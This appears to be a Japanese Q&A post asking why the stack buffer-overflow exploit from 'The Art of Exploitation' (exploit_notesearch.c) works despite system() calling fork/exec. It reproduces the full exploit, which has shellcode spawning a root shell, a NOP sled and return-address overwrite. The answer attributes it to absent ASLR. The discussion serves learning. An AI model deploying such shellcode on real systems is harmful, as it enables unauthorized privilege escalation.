8

私はこの本 Art of Exploitation を読んでいましたが、これはちょっと良い本で、exploit_notesearch.c ファイルからその例に出くわしました。

簡単に言うと、作者は notesearch.c からプログラムをオーバーフローさせようとします。

int main(int argc, char *argv[]) {
    int userid, printing=1, fd;
    char searchstring[100];
    if(argc > 1) // If there is an arg
        strcpy(searchstring, argv[1]);
    else // otherwise,
        searchstring[0] = 0;

メイン関数の引数は検索文字列配列にコピーされ、引数が 100 バイトより大きい場合、メイン関数からの戻りアドレスがオーバーフローします。

作成者は、exploit_notesearch.c にシェルコードを用意し、脆弱な notesearch.c を呼び出します。

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {

    unsigned int i, *ptr, ret, offset=270;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200);

    strcpy(command, "./notesearch \'");
    buffer = command + strlen(command);

    ret = (unsigned int) &i - offset; // Set return address

    for(i=0; i < 160; i+=4) // Fill buffer with return address
        *((unsigned int *)(buffer+i)) = ret;
    memset(buffer, 0x90, 60); // Build NOP sled
    memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

    strcat(command, "\'");

    system(command); //run exploit
}

シェルコードが NOP スレッドと、その NOP スレッドを指すリターン アドレスと組み合わされていることがわかります。作成者はローカル変数 i のアドレスを参照点として使用し、270 バイトを減算して、NOP スレッドのおおよその位置を把握しようとします。

私が理解しているように、著者は、脆弱な notesearch.c のメイン関数のスタックフレームが、exploit_notesearch.c のメイン関数のスタックフレームと同じスタック セグメントにあると想定しています。これは、ローカル変数 i のアドレスを使用したこの操作のみが機能するためだと思います。

しかし、著者は、この system(command) のように system() を使用して、脆弱な notesearch.c を呼び出します。私のポイントは、この関数 system() が内部のどこかで fork() を使用して子プロセスを生成し、その後 exec() 関数を使用してプロセスのイメージを変更することです。しかし、画像が変更された場合、スタック セグメントが新しくなり、exploit_notesearch.c のメイン関数のローカル変数 i のアドレスを使用したすべての操作が役に立たなくなりますが、どういうわけかこのエクスプロイトが機能するため、完全に混乱します。

4

1 に答える 1

11

著者は、C コンパイラがこれら 2 つのプログラムのスタックを同じ (または非常に類似した) 仮想アドレス配置し、オペレーティング システムがアドレスのランダム化 (ASLR)を実行しないと単純に想定しています。これは、両方のメイン機能のスタック フレームがほぼ同じ場所にあることを意味し、このエクスプロイトが可能になります。

ご想像のとおり、これは非常に堅牢な悪用方法ではありません (最新の 64 ビット システムではおそらく失敗するでしょう)。より強力なエクスプロイトでは、リターン指向プログラミングの形式を使用するか、関連するスタック フレームへの既存のchar *argvポインターを利用しようとする可能性があります。

于 2012-01-02T00:43:56.587 に答える